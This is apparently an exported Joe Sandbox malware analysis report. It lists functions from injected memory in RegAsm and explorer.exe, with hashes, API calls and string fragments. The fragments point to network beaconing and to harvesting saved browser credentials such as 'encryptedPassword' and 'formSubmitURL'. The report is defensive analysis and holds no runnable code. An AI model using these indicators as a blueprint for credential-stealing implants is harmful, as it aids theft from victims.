Opcode ID: 726d1e13d0fa7ea11b07a7bcb13a8799ee3dede2e7c0ea3f79d60fa26d0c1fa6
Instruction ID: ba943d442001039f0b26b781b78dd625b77c66ee5601219c1595fd90774d3761
Opcode Fuzzy Hash: 726d1e13d0fa7ea11b07a7bcb13a8799ee3dede2e7c0ea3f79d60fa26d0c1fa6
Instruction Fuzzy Hash: C041BF357057029FDB24EF25DC80B6AB7E9EF89710F040A1DF8569B690DB70E8058B91

Function 0338B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033C728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 033C7294
RTL: Resource at %p, xrefs: 033C72A3
RTL: Re-Waiting, xrefs: 033C72C1

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: b33096797ac2a6750bf52410236c212b6c6d2260b667739f411569029c44e2e7
Instruction ID: 347db27cccc8e937c733df1842cfccc12307b72b171ce092808542c01d2a507d
Opcode Fuzzy Hash: b33096797ac2a6750bf52410236c212b6c6d2260b667739f411569029c44e2e7
Instruction Fuzzy Hash: A841D036B41746AFDB20DF25CCC2B6AB7A9FB44720F180619FC55EB640DB21E8468BD1

Function 03402300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0340238D
___swprintf_l.LIBCMT ref: 034023B3

Strings

]:%u, xrefs: 034023AA
%%%u, xrefs: 03402384

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: c231cc0ae5c1059b8ae85147ad0b0d49dc27d08541223e911f1ba5adc8590ebd
Instruction ID: 1c1a50db70f63daf80de7f7dcdc5316d28daecb1bdd08e738a568becac868110
Opcode Fuzzy Hash: c231cc0ae5c1059b8ae85147ad0b0d49dc27d08541223e911f1ba5adc8590ebd
Instruction Fuzzy Hash: 05318876A002199FDB60DF39CC44BEFB7F8EF44610F444566E849E7280EB70AA458B60

Function 03397D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03397E8B

Strings

+, xrefs: 03397DE8
-, xrefs: 03397DDD

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: d49a137a30669abbda3b695f6aa1c271d30a196c92ed746199d65df9d7e6994f
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: C191A375E20216DFFF24DF69CCC16BEB7A5AF84720F18461BE866AB2D0D73489418710

Function 03359126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 03359175
$, xrefs: 03359191

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 77641014b951f1c44ffdcaca4c7cde39afa0bd8498265b11bc8f4cbefabd44ae
Instruction ID: 0fee826777117c94c60062f3f500eb0bd04c5bdc3387b353efc9108f97811458
Opcode Fuzzy Hash: 77641014b951f1c44ffdcaca4c7cde39afa0bd8498265b11bc8f4cbefabd44ae
Instruction Fuzzy Hash: 44813AB5D00269DBDB31DB54CC84BEEB7B8AF48750F0545EAAA19B7640D7709E80CFA0

Function 033DCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 033DCFBD

Strings

@, xrefs: 033DCF0A
@4Cw@4Cw, xrefs: 033DCFD5, 033DCFDA, 033DCFF1

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: f7cb1dbb9d33bc2abd21d9209d2e0ff11af646183d7bd8aaf0938b72ce825fd7
Instruction ID: 1e26878bd33dfbac6ae1f193a8234342f3a3f8bb76f7ed464aae1c5802222aab
Opcode Fuzzy Hash: f7cb1dbb9d33bc2abd21d9209d2e0ff11af646183d7bd8aaf0938b72ce825fd7
Instruction Fuzzy Hash: 8D4191BAD00314DFDB21DFA5E880AAEBBB8EF85B10F14452AE915DF254D734C801CB64

Analysis Process: explorer.exePID: 4004, Parent PID: 5412COMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.4%
Total number of Nodes:	79
Total number of Limit Nodes:	9

Executed Functions

Function 1135CF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 1135D12E
setsockopt.WS2_32 ref: 1135D830
recv.WS2_32 ref: 1135D859

Strings

&un=, xrefs: 1135D4F1
Co, xrefs: 1135D323
&sql, xrefs: 1135D471
ose, xrefs: 1135D33F
tion, xrefs: 1135D331
nnec, xrefs: 1135D32A
: cl, xrefs: 1135D338
GET , xrefs: 1135D318
dat=, xrefs: 1135D290
&br=, xrefs: 1135D509

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 628681b0a774ead5e18946cfed31c5a1b06d74994c8305f4e9e00ca61e43f6e9
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 0E52AE30618A498FD799EF68C488BD9B7E1FB54708F50462EC49FC714AEE30B54ACB91

Function 1135C232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 1135C449

Strings

`, xrefs: 1135C41D

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 4eddfdf11cc6971baef08e97a12a201af710b1ba3c90c3bac49f549db0142205
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 01224B70A18A0D9FDB89DF68C494AAAF7E5FB98709F40032ED45ED3254DB30E551CB82

Function 1135DE12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 1135DE67

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 8026e3add64406cf56c48e529c8f72c9eab2b0a75e2025bf01abdc7c2726bfc8
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 4701B134628B884F8788EF6CD48452AB7E4FBDD318F000B3EE99AC3254EB70C5414742

Function 1135DE0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 1135DE67

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: e57d52e9b335d773682bbf5f84a021b8c3d39ec411ea8a49bc5a30da822c96c5
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 9901A234628B884B8788EF2C94456A6B3E5FBCE318F000B3EE99AC3244DB21D5024782

Function 113578C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 113579A0

Strings

User-Agent: , xrefs: 11357935, 11357948
urlmon.dll, xrefs: 11357959
on.d, xrefs: 11357902
nt: , xrefs: 1135791E

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: b7d695a29b9c78ae1de68f9b956bfd4d7bbd03b2abd6bf25ad08763727c74977
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 4631F130614A0D8BCB81EFA8C888BEDBBE0FF58609F40422AD44ED7244DE749645C799

Function 113578BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 113579A0

Strings

User-Agent: , xrefs: 11357935, 11357948
urlmon.dll, xrefs: 11357959
on.d, xrefs: 11357902
nt: , xrefs: 1135791E

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 1e8936ce49eaa40bccba486a09c7f311141434f27bad96390575b36225d76b83
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: C0210430614A5D8BCB85EFA8C888BEDBBF0FF5860CF80422AD45AD7244DF749605C799

Function 11353B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExW.KERNEL32 ref: 11353CCA

Strings

.dll, xrefs: 11353BCD
kern, xrefs: 11353B99
el32, xrefs: 11353BA0

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 9167c223faada9a246d4e58cc5f1f4fdd2b1428bb8c9f56b97e29fd163badb60
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: E8414B74918A088FDB84EFA8C4D4BADB7F0FB58308F00467AD84ADB259DE309945CB95

Function 11353B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExW.KERNEL32 ref: 11353CCA

Strings

.dll, xrefs: 11353BCD
kern, xrefs: 11353B99
el32, xrefs: 11353BA0

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 046d07e6c175a91fc0f8c98eb50035421402a929535b2d48540619b2789a8fee
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: A7412B74918A088FDB84EFA8C498BEDB7F0FB58304F04457AD84EDB259DE309945CB95

Function 1135972E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 11359791

Strings

ect, xrefs: 11359761
conn, xrefs: 1135975A

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 3cbac694739cea058467aa74160f2e6f708cdb6b8c072eb0779d0947993371c9
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 7E015E30618B188FCBC4EF1CE088B55B7E0FB59714F1546AED90DCB226C674D8818BC2

Function 11359732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 11359791

Strings

ect, xrefs: 11359761
conn, xrefs: 1135975A

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 5a3329fd6aa986dc25035632048616b24239bc054cd7f4273823be72798c1037
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 3B012C70618A1C8FCBC4EF5CE088B55B7E0FB59314F1542AEE80DCB226CA74C9818BC2

Function 113596B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 11359713

Strings

send, xrefs: 113596DA

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: ff1e9951a8efd1af7e98e9c6541730954ff8d679c079ffc4dcfb5f38126bea52
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 79012570518A1D8FDBC4DF1CD088B15B7E0FB58314F1646AED85DCB266D670D881CB81

Function 113595B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 11359611

Strings

sock, xrefs: 113595D9

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 74420c62722b29e0669d1484eb4384a4ef27875757ee971fdcfa5fdcd46743ea
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 39014470618A1C8FC784DF1CD048B54BBE0FB59314F1545ADD45ECB266D7B0C985CB86

Function 113512DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 1135132D

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: ce5d650c74db7420de29659ce946af83679b2a4b4e359d23245508df962822a9
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 9B318A74604B4ACBDBD4EF298098A95FBA0FB54708F44436EC92DCA10BCB30A450CF91

Function 11351412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 11351461

Memory Dump Source

Source File: 00000008.00000002.3390005992.00000000112F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_112f0000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 6992ad03b7934e6320f8ac31a841115c965ee497462b1614ce599b2ded81ed42
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 4EF0C234268A494FDBC8EB2CD485A2AF7E0FBA9218F41463EE54DC3264DA29D5824716

Non-executed Functions

Function 0E74AD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

ll, xrefs: 0E74AF13
S, xrefs: 0E74B073
net., xrefs: 0E74AF44
32.d, xrefs: 0E74AF0B
el32, xrefs: 0E74AF27
.dll, xrefs: 0E74AF2F
wini, xrefs: 0E74AF72
kern, xrefs: 0E74AF5A
dll, xrefs: 0E74AF4C
user, xrefs: 0E74AF03
M, xrefs: 0E74B082

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 2accc8ae1a9f913ac866b4c594b017c59f807c9d02033a38f009ec3f51f947bb
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: CDE18CB0518F488FC764EF68C4987AAB7E0FB58300F904A2E959FC7265DF70A941CB85

Function 0BE36D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

ll, xrefs: 0BE36F13
M, xrefs: 0BE37082
.dll, xrefs: 0BE36F2F
net., xrefs: 0BE36F44
S, xrefs: 0BE37073
wini, xrefs: 0BE36F72
el32, xrefs: 0BE36F27
user, xrefs: 0BE36F03
32.d, xrefs: 0BE36F0B
dll, xrefs: 0BE36F4C
kern, xrefs: 0BE36F5A

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 458c5797dfd69f30e2f2e371075b03288de098f5e8640e6e0a1b3e484e5df62b
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: F5E15870618F488FCB64EF68C499BABB7E0FB58300F505A2E959BC7241DF30A541CB89

Function 10416D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

net., xrefs: 10416F44
.dll, xrefs: 10416F2F
M, xrefs: 10417082
dll, xrefs: 10416F4C
el32, xrefs: 10416F27
32.d, xrefs: 10416F0B
wini, xrefs: 10416F72
S, xrefs: 10417073
ll, xrefs: 10416F13
kern, xrefs: 10416F5A
user, xrefs: 10416F03

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: b75f64cbbbbdae75179997acfbabc10e23cef874889f1e6063ea77993146c4a4
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 19E16AB4618F488FC764EF68D4857AAB7E1FB58304F404A2EA59BC7241DF34B541CB89

Function 0E874D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

kern, xrefs: 0E874F5A
S, xrefs: 0E875073
M, xrefs: 0E875082
dll, xrefs: 0E874F4C
.dll, xrefs: 0E874F2F
net., xrefs: 0E874F44
user, xrefs: 0E874F03
ll, xrefs: 0E874F13
el32, xrefs: 0E874F27
32.d, xrefs: 0E874F0B
wini, xrefs: 0E874F72

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 12a61ff342537122157126690fe5c6c13dcc4a3a5470f977ed20248bea9f526b
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: CEE15770618F488FC764EF68C4947ABB7E1FB58301F504A2E959BC7255DF30E9418B8A

Function 0E5A7D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E5A7F2F
user, xrefs: 0E5A7F03
kern, xrefs: 0E5A7F5A
el32, xrefs: 0E5A7F27
S, xrefs: 0E5A8073
net., xrefs: 0E5A7F44
ll, xrefs: 0E5A7F13
M, xrefs: 0E5A8082
wini, xrefs: 0E5A7F72
32.d, xrefs: 0E5A7F0B
dll, xrefs: 0E5A7F4C

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 1ff60186ba340e4aebac59526f0134e940fee852ee254d083afca0ebfbddb151
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 30E13874518F488FC7A5EF68C4947ABB7E0FB98300F504E2E969BC7255DF30A9418B89

Function 0E74D792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

encr, xrefs: 0E74D89D
d, xrefs: 0E74D8F2
guid, xrefs: 0E74D7CE
name, xrefs: 0E74D87D
ypte, xrefs: 0E74D8A5
ypte, xrefs: 0E74D8DA
Fiel, xrefs: 0E74D884
dUse, xrefs: 0E74D8AD
rnam, xrefs: 0E74D8B5
e, xrefs: 0E74D8BD
user, xrefs: 0E74D876
Subm, xrefs: 0E74D855
swor, xrefs: 0E74D8EA
form, xrefs: 0E74D84D
itUR, xrefs: 0E74D85D
dPas, xrefs: 0E74D8E2
encr, xrefs: 0E74D8D2

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 279f532a9a7b9f0dfad9dc889f54564f3e958007f4b03e4e9c9c4632eaeb34f3
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: A8B18D71518B488EDB55EF68C489AEEB7F1FF98300F50491ED49AC7261EF70A805CB86

Function 0BE39792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

encr, xrefs: 0BE3989D
e, xrefs: 0BE398BD
d, xrefs: 0BE398F2
Subm, xrefs: 0BE39855
guid, xrefs: 0BE397CE
dPas, xrefs: 0BE398E2
rnam, xrefs: 0BE398B5
swor, xrefs: 0BE398EA
itUR, xrefs: 0BE3985D
encr, xrefs: 0BE398D2
name, xrefs: 0BE3987D
dUse, xrefs: 0BE398AD
form, xrefs: 0BE3984D
ypte, xrefs: 0BE398A5
ypte, xrefs: 0BE398DA
user, xrefs: 0BE39876
Fiel, xrefs: 0BE39884

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 105eb6c1352e5edd63bee74418af7be4e633c27f036e7f1d7fd4788fed107443
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 7FB18930518B488EDB14EF68D48AAEEBBF1FF98300F50551ED49AC7251EF70A449CB86

Function 10419792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

